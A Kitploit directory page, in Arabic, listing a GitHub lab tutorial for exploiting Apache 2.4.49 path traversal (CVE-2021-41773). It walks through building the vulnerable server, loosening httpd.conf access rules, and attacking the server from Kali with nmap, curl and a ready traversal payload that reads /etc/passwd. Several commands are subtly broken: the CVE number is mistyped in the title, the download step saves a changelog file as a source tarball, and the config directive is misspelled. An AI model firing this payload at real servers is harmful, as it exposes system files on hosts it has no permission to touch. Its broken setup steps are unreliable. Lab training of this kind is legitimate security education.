Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
أدوات/GitHubGitHub/alexs18/cve-2021-4773
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubalexs18/cve-2021-4773

CVE-2021-4773

برنامج تعليمي خطوة بخطوة يوضح كيفية إعداد بيئة Apache 2.4.49 قابلة للاستغلال واستغلال CVE-2021-41773 لتجاوز المسار باستخدام أجهزة Kali Linux وUbuntu Server الافتراضية.

عرض المستودع
2منذ 10 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2021-4773

هذا مثال عملي على كيفية استغلال الثغرة CVE-2021-4773 باستخدام آلة افتراضية

لهذا البرنامج التعليمي تحتاج إلى ما يلي:

  • آلة افتراضية مثل كالي لينكس
  • آلة افتراضية مثل خادم أوبونتو
  • تثبيت أباتشي الإصدار 2.4.49

إذاً لنبدأ عندما يكون لديك آلتين افتراضيتين تعملان، ستقوم بتثبيت أباتشي الإصدار 2.4.49 من مستودع أرشيفي يمكنك العثور على هذا الإصدار في: https://archive.apache.org/dist/httpd/CHANGES_2.4.49

تثبيت وتكوين الإصدار الضعيف في خادم أوبونتو

1 في المرة الأولى على خادم آلتك الافتراضية، تحتاج إلى تشغيل الأمر التالي:

root@kitploit:~
curl -k -L -s --compressed https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2  or wget https://archive.apache.org/dist/httpd/CHANGES_2.4.49 > httpd-2.4.49.tar.bz2 

2 في المرة الثانية تحتاج إلى فك ضغط هذا الإصدار من أباتشي كالتالي:

root@kitploit:~
tar -xvjf httpd-2.4.49.tar.bz2

3 قم بتثبيت الحزمة التالية:

root@kitploit:~
sudo apt install build-essential libpcre3 libpcre3-dev libapr1-dev libaprutil1-dev libssl-dev

4 قم بتشغيل ملف التنفيذ في الدليل الرئيسي (اسم الملف configure) باستخدام العلامة لتحديد دليل التثبيت:

root@kitploit:~
./configure --prefix=/usr/local/apache2

5 قم بتجميع الإصدار الضعيف:

root@kitploit:~
make

6 قم بتثبيت الإصدار الضعيف:

root@kitploit:~
make install

7 تحقق من الإصدار:

root@kitploit:~
ls /usr/local/apache2

8 ابدأ العملية:

root@kitploit:~
/usr/local/apache2/bin/apachectl start
  

9 تحقق من العملية:

root@kitploit:~
ps aux | grep httpd

10 قم بتكوين الثغرة: ابحث عن الملف /usr/local/apache2/conf/httpd.conf وقم بتكوين دليل المسؤول ابحث عن وسم directory وقم بتغيير Require all denied إلى

root@kitploit:~
  Required all granted
  

ابحث عن وسم Files .ht* Required all denied إلى

root@kitploit:~
  Required all granted

التغيير الأول هو لاستغلال الثغرة في البيئة المحلية والثاني هو التعريض في البيئة الحقيقية

استغلال الثغرة في كالي لينكس

1 قم بمسح عنوان IP باستخدام nmap بالأمر التالي:

root@kitploit:~
nmap -sV ip_address

2 قم بتنفيذ curl أو wget لاختبار خادم أباتشي:

root@kitploit:~
curl ip_address or make wget ip_address

3 راجع كيفية استغلال الثغرة في الصفحة التالية إذا كنت تريد فهم الصيغة:

root@kitploit:~
https://www.picussecurity.com/resource/blog/simulate-apache-cve-2021-41773-exploits-vulnerability

أو استخدم فقط الحمولة التالية:

root@kitploit:~
http://$host/cgi-bin/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
تنزيل الأداة